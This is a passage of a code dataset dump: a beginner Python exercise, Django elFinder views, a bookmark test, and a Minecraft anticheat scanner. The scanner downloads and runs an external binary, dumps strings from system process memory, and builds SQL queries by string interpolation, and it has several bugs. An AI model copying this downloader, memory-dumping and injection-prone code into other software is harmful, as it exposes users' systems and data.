0011 1100\r\nb = 13 # 13 = 0000 1101\r\nprint (bin(a), bin(b))\r\nc= a & b\r\nprint (c)\r\n\r\n\r\n#membership operators\r\nx=10; y=20\r\nlist = [10,2,3,4,5,60]\r\nif(a not in list):\r\n print('X=',x,'is in the list')\r\nelif(y not in list):\r\n print('Y=',y,'is not in the list')\r\nprint('\\n')\r\nc = y/x\r\nif(c in list):\r\n print('C = ', c , 'is in the list')\r\n\r\n\r\n\r\n#identity operators\r\nx=10; y=20\r\n\r\nif(x is y):\r\n print(\"x and y have same identity\")\r\nelse:\r\n print(\"x and y haven't same identity\")\r\n\r\n#opertaor precedence\r\na = 20\r\nb = 10\r\nc = 15\r\nd = 5\r\n\r\nprint (\"a:%d b:%d c:%d d:%d\" % (a,b,c,d ))\r\ne = (a + b) * c / d #( 30 * 15 ) / 5\r\nprint (\"Value of (a + b) * c / d is \", e)\r\n\r\n#decision making\r\na=int (input(\"Enter Number! you fool.\"))\r\nif(a==100): print(\"value is 100\")\r\nelif(a==200): print(\"value is 200\")\r\n\r\n#discount program\r\namount = int(input(\"Enter amount:\"))\r\nif amount>=1000:\r\n discount = amount*0.05\r\n print(\"Discount = \",discount)\r\nelse:\r\n discount = amount*0.10\r\n print(\"Discount = \",discount)\r\n \r\nprint (\"Net payable:\",amount-discount)\r\n\r\n# while loop\r\ncount = 0;\r\nwhile(count < 9):\r\n print(\"The count is: \", count)\r\n count += 1\r\n\r\n\r\n\r\nvar = 1\r\nwhile var==1:\r\n num = input(\"Enter a number :\")\r\n print(\"You entered \" , num)\r\n break\r\n\r\n\r\nflag = 1\r\nwhile (flag): print(\"This is true\")\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Python Projects/Practice Programs/Program1.py","file_name":"Program1.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"346974644","text":"import json\n\nfrom django.contrib.auth.decorators import user_passes_test\nfrom django.core.serializers.json import DjangoJSONEncoder\nfrom django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import render\nfrom django.utils.functional import cached_property\nfrom django.views.decorators.cache import never_cache\nfrom django.views.decorators.csrf import ensure_csrf_cookie\n\nfrom elfinder.conf import settings\nfrom elfinder.connector import ElFinderConnector\nfrom elfinder.volume_drivers import get_volume_driver\n\n\nclass VolumeDriver(object):\n def __init__(self, request, json_response=False, name=None, **options):\n self.request = request\n self.options = options\n self.json_response = json_response\n self._name = name\n\n @cached_property\n def name(self):\n if self._name is None:\n request_method = getattr(self.request, self.request.method)\n return request_method.get('volume', 'default')\n else:\n return self._name\n\n @cached_property\n def volume(self):\n volume = get_volume_driver(self.name,\n request=self.request,\n **self.options)\n return volume\n\n @staticmethod\n def _access_view(req):\n return True\n\n def __bool__(self):\n return self.login_view is True\n\n __nonzero__ = __bool__\n\n @cached_property\n def login_view(self):\n \"\"\"Checks if volume is project by authentication.\n (redirect to view accordingly)\"\"\"\n if self.volume.login_required:\n decorator = user_passes_test(test_func=self.volume.login_test_func,\n login_url=self.volume.login_url)\n response = decorator(self._access_view)(self.request)\n if response is not True:\n if self.json_response:\n return JsonResponse({'error': \"Login required!\"})\n else:\n return response\n return True\n\n\n@ensure_csrf_cookie\n@never_cache\ndef index(request, coll_id=None):\n \"\"\" Displays the elFinder file browser template for the specified\n collection.\n \"\"\"\n volume_driver = VolumeDriver(request, collection_id=coll_id)\n\n if not volume_driver: # not has access\n return volume_driver.login_view\n context = {\n 'coll_id': coll_id,\n 'volume_driver': volume_driver\n }\n return render(request,\n # Possibility to configure a custom template\n volume_driver.volume.get_index_template(\"elfinder/index.html\"),\n context=context,\n using=settings.ELFINDER_TEMPLATE_ENGINE)\n\n\n@ensure_csrf_cookie\ndef connector_view(request, coll_id=None):\n \"\"\" Handles requests for the elFinder connector.\n \"\"\"\n volume_driver = VolumeDriver(request,\n json_response=True,\n collection_id=coll_id)\n\n if not volume_driver: # not has access\n return volume_driver.login_view\n\n finder = ElFinderConnector([volume_driver.volume])\n try:\n finder.run(request)\n except:\n if settings.ELFINDER_DEBUG:\n import traceback\n traceback.print_exc()\n raise\n # Some commands (e.g. read file) will return a Django View - if it\n # is set, return it directly instead of building a response\n if finder.return_view:\n return finder.return_view\n\n response = HttpResponse(content_type=finder.httpHeader['Content-type'])\n response.status_code = finder.httpStatusCode\n if finder.httpHeader['Content-type'] == 'application/json':\n response.content = json.dumps(finder.httpResponse,\n cls=DjangoJSONEncoder,\n ensure_ascii=False)\n else:\n response.content = finder.httpResponse\n\n return response\n\n\ndef read_file(request, volume, file_hash, template=\"elfinder/read_file.html\"):\n \"\"\" Default view for responding to \"open file\" requests.\n\n coll: FileCollection this File belongs to\n file: The requested File object\n \"\"\"\n return render(request, template,\n context={'file': file_hash},\n using=settings.ELFINDER_TEMPLATE_ENGINE)\n","sub_path":"elfinder/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"388043234","text":"# Start Imports\nimport os\nimport re\nimport time\nimport shutil\nimport psutil\nimport requests\nimport colorama\nimport subprocess\nimport bimpy as bp\nimport config as cfg\nimport elevate as elevate\n# mysql-connector-python\nimport mysql.connector\n\nfrom sys import exit\nfrom os import listdir\nfrom colorama import Fore\nfrom os.path import isfile\nfrom threading import Thread\nfrom datetime import datetime\nfrom bimpy.utils import help_marker\n# End Imports\n\n\n# noinspection PyBroadException\nclass Nex(bp.App):\n\tdef __init__(self):\n\t\tsuper(Nex, self).__init__(height=300, width=800, title='Nex Anticheat System')\n\t\tself.sqlCnx = None\n\t\tself.sqlCursor = None\n\t\tself.user_path = '/'.join(os.getcwd().split('\\\\', 3)[:3])\n\t\tself.drive_letter = os.getcwd().split('\\\\', 1)[0]+'/'\n\t\tself.winUsername = os.getlogin()\n\t\tself.javawPid = ''\n\t\tself.mcPath = ''\n\t\tself.lunarClient = False\n\n\t\tself.recordingResult = ''\n\t\tself.inInstanceCheats = ''\n\t\tself.outCheats = ''\n\t\tself.Check02 = 'passed'\n\t\tself.Check03 = 'passed'\n\t\tself.Check04 = 'passed'\n\t\tself.Check05 = 'passed'\n\t\tself.Check06 = 'passed'\n\t\tself.Check07 = 'passed'\n\t\tself.deletedFiles = ''\n\n\t\tself.s = bp.String()\n\t\tself.f = bp.Float()\n\t\tself.barValue = 0\n\t\tself.verified = False\n\t\tself.cancel = False\n\t\tself.startedScan = False\n\t\tself.lastCheck = ''\n\t\tself.currentAction = bp.String()\n\n\t\tbp.push_style_var(bp.Style.FrameRounding, 10)\n\t\tbp.load_fonts(size=20)\n\t\tcolorama.init()\n\n\t@staticmethod\n\tdef asRoot():\n\t\tif elevate.isRootUser():\n\t\t\televate.runRoot(wait=False)\n\t\t\texit()\n\n\t# Finds minecraft process and gets info\n\tdef mcProcess(self):\n\t\tpid = 0\n\t\tmcprocess_info = {}\n\n\t\t# Get processes with the name \"javaw\"\n\t\tprocess = [p for p in psutil.process_iter(attrs=['pid', 'name']) if 'javaw' in p.info['name']]\n\t\tif process:\n\t\t\tprocess = process[0]\n\t\t\tpid = process.info['pid']\n\t\t\t# print(f'{cfg.prefix} Minecraft found on PID: {pid}')\n\t\telse:\n\t\t\tinput('Minecraft not found...\\nPress enter to continue')\n\t\t\tquit()\n\n\t\t# Get all command line arguments of process\n\t\tprocess = process.cmdline()\n\t\tfor argument in process:\n\t\t\tif \"--\" in argument:\n\t\t\t\tmcprocess_info[argument.split(\"--\")[1]] = process[process.index(argument) + 1]\n\n\t\tself.javawPid = pid\n\t\tself.mcPath = mcprocess_info[\"version\"]\n\n\t\tcustomClient = False\n\t\ttry:\n\t\t\tdetectCustom = mcprocess_info[\"username\"]\n\t\texcept:\n\t\t\tcustomClient = True\n\n\t\tif customClient is True:\n\t\t\tif 'com.moonsworth.lunar.patcher.LunarMain' in process:\n\t\t\t\tself.lunarClient = True\n\t\t\telse:\n\t\t\t\tself.lunarClient = False\n\n\tdef on_update(self):\n\n\t\tif self.verified is False:\n\t\t\tif self.cancel is False:\n\t\t\t\tbp.new_line()\n\t\t\t\tbp.new_line()\n\t\t\t\tbp.new_line()\n\t\t\t\tbp.text(' Enter pin :')\n\t\t\t\tbp.same_line()\n\n\t\t\t\tbp.input_text('', self.s, 200, bp.InputTextFlags.Password)\n\t\t\t\t# bp.input_text('', self.s, 200)\n\t\t\t\tif cfg.disableAuth is False:\n\t\t\t\t\tif len(self.s.value) == 5:\n\t\t\t\t\t\tif self.lastCheck != self.s.value:\n\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\turl = f'https://auth2.atome.cc/index.php?pin={self.s.value}'\n\t\t\t\t\t\t\t\tr = requests.get(url)\n\n\t\t\t\t\t\t\t\tif 'verified' not in r.text:\n\t\t\t\t\t\t\t\t\tself.cancel = True\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tself.verified = True\n\n\t\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\t\tself.cancel = True\n\n\t\t\t\t\t\tself.lastCheck = self.s.value\n\t\t\t\telse:\n\t\t\t\t\tself.verified = True\n\t\t\telse:\n\t\t\t\tbp.new_line()\n\t\t\t\tbp.new_line()\n\t\t\t\tbp.new_line()\n\t\t\t\tbp.text('An error has occured. If this error persist, try to contact the staff.')\n\t\telif self.cancel is False:\n\t\t\tbp.new_line()\n\t\t\tbp.new_line()\n\t\t\tbp.text(self.currentAction.value)\n\t\t\tbp.progress_bar(self.barValue)\n\n\t\t\tif len(self.recordingResult) > 2:\n\t\t\t\tbp.text('Record software found')\n\t\t\t\tbp.same_line()\n\t\t\t\thelp_marker(self.recordingResult + ' has been found')\n\n\t\t\tif 'failed' in self.Check02:\n\t\t\t\tbp.text('Illegal modifications times found')\n\t\t\t\tbp.same_line()\n\t\t\t\thelp_marker('The explorer process has been restarted in the last 5 minutes')\n\n\t\t\tif 'failed' in self.Check03:\n\t\t\t\tbp.text('In game cheat found.')\n\t\t\t\tbp.same_line()\n\t\t\t\thelp_marker('Cheat : ' + self.inInstanceCheats)\n\n\t\t\tif 'failed' in self.Check04:\n\t\t\t\tbp.text('External cheat found')\n\t\t\t\tbp.same_line()\n\t\t\t\thelp_marker('Cheat : ' + self.outCheats)\n\n\t\t\tif 'failed' in self.Check05:\n\t\t\t\tbp.text('JNativeHook found')\n\n\t\t\tif 'failed' in self.Check06:\n\t\t\t\tbp.text('Executed deleted files found')\n\t\t\t\tbp.same_line()\n\t\t\t\thelp_marker(self.deletedFiles)\n\n\t\t\tif 'failed' in self.Check07:\n\t\t\t\tbp.text('Executed library files found')\n\t\t\t\tbp.same_line()\n\t\t\t\thelp_marker(self.deletedDLLs)\n\n\n\t\t\tif self.startedScan is False:\n\t\t\t\tself.startedScan = True\n\t\t\t\tprint('starting scan :D')\n\t\t\t\tp = Thread(target=self.doAnything, args=(self, ))\n\t\t\t\tp.daemon = False\n\t\t\t\tp.start()\n\t\telse:\n\t\t\tbp.new_line()\n\t\t\tbp.new_line()\n\t\t\tbp.new_line()\n\t\t\tbp.text('An error has occured. If this error persist, try to contact the staff.')\n\n\n\n\tdef addPercentageToProgress(self, perc):\n\t\tadded = 0\n\n\t\tfor i in range(0, perc * 10):\n\t\t\ttime.sleep(0.004)\n\t\t\tself.barValue = self.barValue + 0.001\n\n\t# Downloads all necessary files\n\tdef dependencies(self):\n\t\tpath = f'{self.drive_letter}/Windows/Temp/Nex'\n\t\tif not os.path.exists(path):\n\t\t\tos.mkdir(path)\n\t\twith open(f'{path}/strings2.exe', 'wb') as f:\n\t\t\tf.write(requests.get(cfg.stringsSoftware).content)\n\t\tself.currentAction.value = 'Downloading dependencies'\n\t\t# Thread(target=self.addPercentageToProgress, args=(self, 10)).start()\n\t\tself.addPercentageToProgress(10)\n\n\tdef connectDatabase(self):\n\t\t# Don't forget to set only read permissions to this user for more security.\n\t\tif cfg.enableDatabase is True:\n\t\t\ttry:\n\t\t\t\tself.sqlCnx = mysql.connector.connect(host=f'{cfg.host}', user=f'{cfg.user}', password=f'{cfg.password}', database=f'{cfg.database}')\n\t\t\t\tself.sqlCursor = self.sqlCnx.cursor()\n\t\t\texcept:\n\t\t\t\tself.cancel = True\n\t\t\t\tinput('Cannot connect to the database...\\nPress enter to continue')\n\t\t\t\tquit()\n\n\t@staticmethod\n\tdef doAnything(self):\n\t\tself.connectDatabase()\n\n\t\tself.mcProcess()\n\t\tself.dependencies()\n\n\t\t# Check #01\n\t\tself.recordingCheck()\n\n\t\t# Check #02\n\t\tself.modificationTimes()\n\n\t\t# Check #03\n\t\tself.inInstance()\n\n\t\t# Check #04\n\t\tself.outOfInstance()\n\n\t\t# Check #05\n\t\tself.jnativehook()\n\n\t\t# Check #06\n\t\tself.executedDeleted()\n\n\t\t# Check #07\n\t\tself.deletedDLL()\n\n\t\t# Check #08\n\t\tif cfg.enableCheck08 is True:\n\t\t\tself.checkScansHistory()\n\n\t\treturn True\n\n\t# Gets PID of a process from name\n\t@staticmethod\n\tdef getPID(name, service=False):\n\t\tif service:\n\t\t\tresponse = str(subprocess.check_output(f'tasklist /svc /FI \"Services eq {name}')).split('\\\\r\\\\n')\n\t\t\tfor process in response:\n\t\t\t\tif name in process:\n\t\t\t\t\tpid = process.split()[1]\n\t\t\t\t\treturn pid\n\t\telse:\n\t\t\tpid = [p.pid for p in psutil.process_iter(attrs=['pid', 'name']) if name == p.name()][0]\n\t\t\treturn pid\n\n\t# Get process start time\n\t@staticmethod\n\tdef proc_starttime(pid):\n\t\t# https://gist.github.com/westhood/1073585\n\t\tp = re.compile(r\"^btime (\\d+)$\", re.MULTILINE)\n\t\twith open(\"/proc/stat\") as f:\n\t\t\tm = p.search(f.read())\n\t\t\tbtime = int(m.groups()[0])\n\n\t\tclk_tck = os.sysconf(os.sysconf_names[\"SC_CLK_TCK\"])\n\t\twith open(\"/proc/%d/stat\" % pid) as f:\n\t\t\tstime = int(f.read().split()[21]) / clk_tck\n\n\t\treturn datetime.fromtimestamp(btime + stime)\n\n\t# Gets/Dumps strings via a PID\n\tdef dump(self, pid):\n\t\tcmd = f'{self.drive_letter}/Windows/Temp/Nex/strings2.exe -pid {pid} -raw -nh'\n\t\tstrings = str(subprocess.check_output(cmd)).replace('\\\\\\\\', \"/\")\n\t\tstrings = list(set(strings.split(\"\\\\r\\\\n\")))\n\n\t\treturn strings\n\n\t# Checking for recording software\n\tdef recordingCheck(self):\n\t\tself.addPercentageToProgress(11)\n\t\tself.currentAction.value = 'Checking for recording software'\n\t\tprint(end=f'{cfg.prefix}' + Fore.CYAN + ' Running check #01')\n\t\ttasks = str(subprocess.check_output('tasklist')).lower()\n\t\tfound = [x for x in cfg.recordingSoftwares if x in tasks]\n\n\t\tif found:\n\t\t\tfor software in found:\n\t\t\t\tprint(' : ' + Fore.RED + f' Not Clean ({cfg.recordingSoftwares[software]})' + Fore.WHITE)\n\t\t\t\tself.barValue.value = 1\n\t\t\t\tself.recordingResult = cfg.recordingSoftwares[software]\n\n\t\t\t\tNex.end()\n\t\telse:\n\t\t\tprint(' :' + Fore.GREEN + ' Clean' + Fore.WHITE)\n\n\n\t# Checks modification/run times\n\tdef modificationTimes(self):\n\t\tself.addPercentageToProgress(11)\n\t\tself.currentAction.value = 'Checking modification time.'\n\t\tprint(end=f'{cfg.prefix}' + Fore.CYAN + ' Running check #02')\n\t\tSID = str(subprocess.check_output(f'wmic useraccount where name=\"{self.winUsername}\" get sid')).split('\\\\r\\\\r\\\\n')[1]\n\t\trecycle_bin_path = self.drive_letter+\"/$Recycle.Bin/\"+SID\n\n\t\t# Recycle bin modified time check\n\t\trecyclebinTime = datetime.fromtimestamp(os.path.getmtime(recycle_bin_path))\n\t\tcurrentTime = datetime.now()\n\t\tbinDiffTime = currentTime - recyclebinTime\n\t\tminutes = binDiffTime.total_seconds() / 60\n\n\t\texplorerPid = self.getPID('explorer.exe')\n\t\tp = psutil.Process(explorerPid)\n\t\texplorerTime = datetime.fromtimestamp(p.create_time())\n\n\t\texplorerDiffTime = currentTime - explorerTime\n\t\tminutes2 = explorerDiffTime.total_seconds() / 60\n\n\t\tif minutes2 < 300:\n\t\t\tself.Check02 = 'failed'\n\t\t\tprint(' :' + Fore.RED + ' Not Clean' + Fore.WHITE)\n\t\telse:\n\t\t\tprint(' :' + Fore.GREEN + ' Clean' + Fore.WHITE)\n\n\t@staticmethod\n\tdef mins_between(d1, d2):\n\n\t\td1 = datetime.strptime(d1, \"%H-%M-%S\")\n\t\td2 = datetime.strptime(d2, \"%H-%M-%S\")\n\t\treturn abs((d2 - d1).minutes)\n\n\t# In Instance Checks\n\tdef inInstance(self):\n\t\tself.currentAction.value = 'Checking for in game modifications'\n\t\tself.addPercentageToProgress(6)\n\n\t\tfoundHeuristic = []\n\t\tprint(end=f'{cfg.prefix}' + Fore.CYAN + ' Running check #03')\n\t\tif self.lunarClient is True:\n\t\t\tjavawStrings = self.dump(self.javawPid)\n\t\t\tfound = [f'{cfg.javawStrings[x]}' for x in javawStrings if x in cfg.javawStrings]\n\n\t\t\tif '1.8' in self.mcPath:\n\t\t\t\tfoundHeuristic = [f'{cfg.lunar18Strings[x]}' for x in javawStrings if x in cfg.lunar18Strings]\n\n\t\t\tif found:\n\t\t\t\tfor hack in found:\n\t\t\t\t\tself.Check03 = 'failed'\n\t\t\t\t\tself.inInstanceCheats = hack\n\t\t\t\t\tprint(f' :' + Fore.RED + f' Not Clean ({hack})' + Fore.WHITE)\n\t\t\telif foundHeuristic:\n\t\t\t\tfor hack in foundHeuristic:\n\t\t\t\t\tself.Check03 = 'failed'\n\t\t\t\t\tself.inInstanceCheats = hack\n\t\t\t\t\tprint(f' :' + Fore.RED + f' Not Clean ({hack})' + Fore.WHITE)\n\t\t\telse:\n\t\t\t\tprint(' :' + Fore.GREEN + ' Clean' + Fore.WHITE)\n\t\telse:\n\t\t\tjavawStrings = self.dump(self.javawPid)\n\t\t\tfound = [f'{cfg.javawStrings[x]}' for x in javawStrings if x in cfg.javawStrings]\n\n\t\t\tif '1.8' in self.mcPath:\n\t\t\t\tfoundHeuristic = [f'{cfg.minecraft18Strings[x]}' for x in javawStrings if x in cfg.minecraft18Strings]\n\t\t\telif '1.7' in self.mcPath:\n\t\t\t\tfoundHeuristic = [f'{cfg.minecraft17Strings[x]}' for x in javawStrings if x in cfg.minecraft17Strings]\n\n\t\t\tif found:\n\t\t\t\tfor hack in found:\n\t\t\t\t\tself.Check03 = 'failed'\n\t\t\t\t\tself.inInstanceCheats = hack\n\t\t\t\t\tprint(f' :' + Fore.RED + f' Not Clean ({hack})' + Fore.WHITE)\n\t\t\telif foundHeuristic:\n\t\t\t\tfor hack in foundHeuristic:\n\t\t\t\t\tself.Check03 = 'failed'\n\t\t\t\t\tself.inInstanceCheats = hack\n\t\t\t\t\tprint(f' :' + Fore.RED + f' Not Clean ({hack})' + Fore.WHITE)\n\t\t\telse:\n\t\t\t\tprint(' :' + Fore.GREEN + ' Clean' + Fore.WHITE)\n\t\tself.addPercentageToProgress(6)\n\n\t# Out of instance checks\n\tdef outOfInstance(self):\n\t\tself.currentAction.value = 'Checking for external modifications'\n\t\tself.addPercentageToProgress(6)\n\t\tprint(end=f'{cfg.prefix}' + Fore.CYAN + ' Running check #04')\n\t\tdpsPid = self.getPID('DPS', service=True)\n\t\tstrings = self.dump(dpsPid)\n\t\tstrings = ['.exe!'+x.split('!')[3] for x in strings if '.exe!' in x and x.startswith('!!')]\n\n\t\tfound = [x for x in cfg.dpsStrings if x in strings]\n\n\t\tif found:\n\t\t\tfor string in found:\n\t\t\t\tself.Check04 = 'failed'\n\t\t\t\tself.outCheats = cfg.dpsStrings[string]\n\t\t\t\tprint(f' :' + Fore.RED + f' Not Clean ({cfg.dpsStrings[string]})' + Fore.WHITE)\n\t\telse:\n\t\t\tprint(' :' + Fore.GREEN + ' Clean' + Fore.WHITE)\n\n\t\tself.addPercentageToProgress(6)\n\n\t# Checks for JNativeHook based autoclicker\n\tdef jnativehook(self):\n\n\t\tself.currentAction.value = 'Checking for JNativeHook'\n\t\tself.addPercentageToProgress(5)\n\t\tprint(end=f'{cfg.prefix}' + Fore.CYAN + ' Running check #05')\n\t\tpath = f'{self.user_path}/AppData/Local/Temp'\n\n\t\tfound = [x for x in listdir(path) if isfile(f'{path}/{x}') if 'JNativeHook' in x and x.endswith('.dll')]\n\n\t\tif found:\n\t\t\tself.Check05 = 'failed'\n\t\t\tprint(f' : ' + Fore.RED + f' Not Clean')\n\t\telse:\n\t\t\tprint(' :' + Fore.GREEN + ' Clean' + Fore.WHITE)\n\t\tself.addPercentageToProgress(6)\n\n\t# Gets recently executed + deleted files\n\tdef executedDeleted(self):\n\n\t\tself.currentAction.value = 'Checking for executed and deleted files'\n\t\tself.addPercentageToProgress(5)\n\t\tprint(end=f'{cfg.prefix}' + Fore.CYAN + ' Running check #06')\n\t\tpcasvcPid = self.getPID('PcaSvc', service=True)\n\t\texplorerPid = self.getPID('explorer.exe')\n\t\tpcasvcStrings = self.dump(pcasvcPid)\n\t\texplorerStrings = self.dump(explorerPid)\n\n\t\tdeleted = {}\n\n\t\tfor string in pcasvcStrings:\n\t\t\t# string = string.lower()\n\t\t\tif string.startswith(self.drive_letter) and string.endswith('.exe'):\n\t\t\t\tif not os.path.isfile(string):\n\n\t\t\t\t\tif string in explorerStrings:\n\t\t\t\t\t\tfilename = string.split('/')[-1]\n\t\t\t\t\t\tself.Check06 = 'failed'\n\t\t\t\t\t\tself.deletedFiles = self.deletedFiles + string + '\\n'\n\t\t\t\t\t\tdeleted[string] = {'filename': string, 'method': '01'}\n\n\t\tif explorerStrings:\n\t\t\tfor string in explorerStrings:\n\t\t\t\tstring = string.lower()\n\t\t\t\tif 'trace' and 'pcaclient' in string:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tpath = [x for x in string.split(',') if '.exe' in x][0]\n\t\t\t\t\t\tif not os.path.isfile(path):\n\t\t\t\t\t\t\tfilename = path.split('/')[-1]\n\t\t\t\t\t\t\tself.Check06 = 'failed'\n\t\t\t\t\t\t\tself.deletedFiles = self.deletedFiles + path + '\\n'\n\t\t\t\t\t\t\tdeleted[path] = {'filename': path, 'method': '02'}\n\t\t\t\t\texcept:\n\t\t\t\t\t\tcontinue\n\n\t\tif deleted:\n\t\t\tprint(' :' + Fore.RED + ' Not Clean')\n\t\t\tprint('')\n\t\t\tfor path in deleted:\n\t\t\t\tprint(f'\t- {path}' + Fore.RED)\n\t\telse:\n\t\t\tprint(' :' + Fore.GREEN + ' Clean' + Fore.WHITE)\n\n\t\tprint('')\n\t\tself.addPercentageToProgress(6)\n\n\t# New method to detect deleted dll files.\n\tdef deletedDLL(self):\n\n\t\tself.currentAction.value = 'Checking for deleted library files'\n\t\tself.addPercentageToProgress(5)\n\t\tprint(end=f'{cfg.prefix}' + Fore.CYAN + ' Running check #07')\n\n\t\tdllFiles = {}\n\t\texplorerPid = self.getPID('explorer.exe')\n\t\texplorerStrings = self.dump(explorerPid)\n\n\t\tif explorerStrings:\n\t\t\tfor string in explorerStrings:\n\t\t\t\tif string.startswith(self.drive_letter) and string.endswith('.dll'):\n\t\t\t\t\tif not os.path.exists(string) and 'C:\\Windows\\system32' not in string and 'C:\\Windows\\System32' not in string:\n\t\t\t\t\t\tself.Check06 = 'failed'\n\t\t\t\t\t\tself.deletedDLLs = self.deletedDLLs + string + '\\n'\n\t\t\t\t\t\tdllFiles[string] = {'filename': string, 'method': '03'}\n\n\t\tif dllFiles is True:\n\t\t\tprint(' :' + Fore.RED + ' Not Clean')\n\t\t\tself.Check07 = 'failed'\n\t\t\tprint('')\n\t\t\tfor path in dllFiles:\n\t\t\t\tprint(f'\t- {path}' + Fore.RED)\n\t\telse:\n\t\t\tprint(' :' + Fore.GREEN + ' Clean' + Fore.WHITE)\n\t\tprint('')\n\t\tself.addPercentageToProgress(6)\n\n\tdef checkScansHistory(self):\n\n\t\tself.currentAction.value = 'Checking for old scans in the database'\n\t\tself.addPercentageToProgress(5)\n\t\tprint(end=f'{cfg.prefix}' + Fore.CYAN + ' Running check #08')\n\t\tif cfg.enableDatabase is False:\n\t\t\tself.addPercentageToProgress(5)\n\t\t\treturn\n\n\t\tResult02 = False\n\t\tResult03 = False\n\t\tResult04 = False\n\t\tResult05 = False\n\n\t\tquery = f'SELECT Check02 FROM scans WHERE HWID = \"{cfg.hwid}\"'\n\t\tself.sqlCursor.execute(query)\n\t\tfor Check02 in self.sqlCursor:\n\t\t\tif str(Check02) == '(\\'failed\\',)':\n\t\t\t\tResult02 = True\n\n\t\tquery = f'SELECT Check03 FROM scans WHERE HWID = \"{cfg.hwid}\"'\n\t\tself.sqlCursor.execute(query)\n\t\tfor Check03 in self.sqlCursor:\n\t\t\tif str(Check03) == '(\\'failed\\',)':\n\t\t\t\tResult03 = True\n\n\t\tquery = f'SELECT Check04 FROM scans WHERE HWID = \"{cfg.hwid}\"'\n\t\tself.sqlCursor.execute(query)\n\t\tfor Check04 in self.sqlCursor:\n\t\t\tif str(Check04) == '(\\'failed\\',)':\n\t\t\t\tResult04 = True\n\n\t\tquery = f'SELECT Check05 FROM scans WHERE HWID = \"{cfg.hwid}\"'\n\t\tself.sqlCursor.execute(query)\n\t\tfor Check05 in self.sqlCursor:\n\t\t\tif str(Check05) == '(\\'failed\\',)':\n\t\t\t\tResult05 = True\n\t\tallResults = ''\n\n\t\tif Result02 is True:\n\t\t\tallResults = 'Check #02, '\n\t\tif Result03 is True:\n\t\t\tallResults = allResults + 'Check #03, '\n\t\tif Result04 is True:\n\t\t\tallResults = allResults + 'Check #04, '\n\t\tif Result05 is True:\n\t\t\tallResults = allResults + 'Check #05'\n\n\t\tif 'Check' in allResults:\n\t\t\tprint(' :' + Fore.RED + f' Not Clean ({allResults})' + Fore.WHITE)\n\t\telse:\n\t\t\tprint(' :' + Fore.GREEN + ' Clean' + Fore.WHITE)\n\n\t\tself.addPercentageToProgress(5)\n\n\t@staticmethod\n\tdef end():\n\n\t\tinput('\\nScan finished\\nPress enter to exit..')\n\t\t# input('\\nPress enter to exit...')\n\t\ttemp = f'{Nex.drive_letter}/Windows/Temp/Nex'\n\t\tif os.path.exists(temp):\n\t\t\tshutil.rmtree(temp)\n\t\texit()\n\n\tdef saveScan(self):\n\t\tif self.deletedFiles == '':\n\t\t\tself.deletedFiles = 'none'\n\n\t\tif cfg.enableDatabase is False:\n\t\t\treturn\n\n\t\tquery = f'INSERT INTO Scans (ScanID, HWID, Check02, Check03, Check04, Check05, Check06, deletedFiles) VALUES '\n\t\tquery = query + f'(\"{cfg.scanID}\", \"{cfg.hwid}\", \"{self.Check02}\", \"{self.Check03}\", \"{self.Check04}\", '\n\t\tquery = query + f'\"{self.Check05}\", \"{self.Check06}\", \"{self.deletedFiles}\")'\n\n\t\tself.sqlCursor.execute(query)\n\t\tself.sqlCnx.commit()\n\n\n\nNex = Nex()\nNex.asRoot()\n\nNex.run()\nquit()\n# Nex.connectDatabase()\n# Nex.mcProcess()\n# Nex.dependencies()\n\n#print(f'{cfg.prefix} Starting Scan with ID: {cfg.scanID}\\n')\n# print(f'{cfg.prefix} HWID : {cfg.hwid}\\n')\n\n# Check #01\n# Nex.recordingCheck()\n\n# Check #02\n# Nex.modificationTimes()\n\n# Check #03\n# Nex.inInstance()\n\n# Check #04\n# Nex.outOfInstance()\n\n# Check #05\n# Nex.jnativehook()\n\n# Check #06\n# Nex.executedDeleted()\n\n# Check #07\n# Nex.deletedDLL()\n\n# Check #08\n# if cfg.enableCheck08 is True and cfg.enableDatabase is True:\n# Nex.checkScansHistory()\n# else:\n# \tprint(end=f'{cfg.prefix}' + Fore.CYAN + ' Running check #08' + ' :' + Fore.YELLOW + ' Skipped' + Fore.WHITE)\n\n\n# Nex.saveScan()\n# Nex.end()\n","sub_path":"nex-client/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":17795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"647868440","text":"from unittest.mock import Mock\nfrom bookmarks.models import BookmarkSearch\nfrom django.test import TestCase\n\n\nclass BookmarkSearchModelTest(TestCase):\n def test_from_request(self):\n # no params\n mock_request = Mock()\n mock_request.GET = {}\n\n search = BookmarkSearch.from_request(mock_request)\n self.assertEqual(search.q, '')\n self.assertEqual(search.sort, BookmarkSearch.SORT_ADDED_DESC)\n self.assertEqual(search.user, '')\n\n # some params\n mock_request.GET = {\n 'q': 'search query',\n 'user': 'user123',\n }\n\n bookmark_search = BookmarkSearch.from_request(mock_request)\n self.assertEqual(bookmark_search.q, 'search query')\n self.assertEqual(bookmark_search.sort, BookmarkSearch.SORT_ADDED_DESC)\n self.assertEqual(bookmark_search.user, 'user123')\n\n # all params\n mock_request.GET = {\n 'q': 'search query',\n 'user': 'user123',\n 'sort': BookmarkSearch.SORT_TITLE_ASC\n }\n\n search = BookmarkSearch.from_request(mock_request)\n self.assertEqual(search.q, 'search query')\n self.assertEqual(search.user, 'user123')\n self.assertEqual(search.sort, BookmarkSearch.SORT_TITLE_ASC)\n\n def test_modified_params(self):\n # no params\n bookmark_search = BookmarkSearch()\n modified_params = bookmark_search.modified_params\n self.assertEqual(len(modified_params), 0)\n\n # params are default values\n bookmark_search = BookmarkSearch(q='', sort=BookmarkSearch.SORT_ADDED_DESC, user='')\n modified_params = bookmark_search.modified_params\n self.assertEqual(len(modified_params), 0)\n\n # some modified params\n bookmark_search = BookmarkSearch(q='search query', 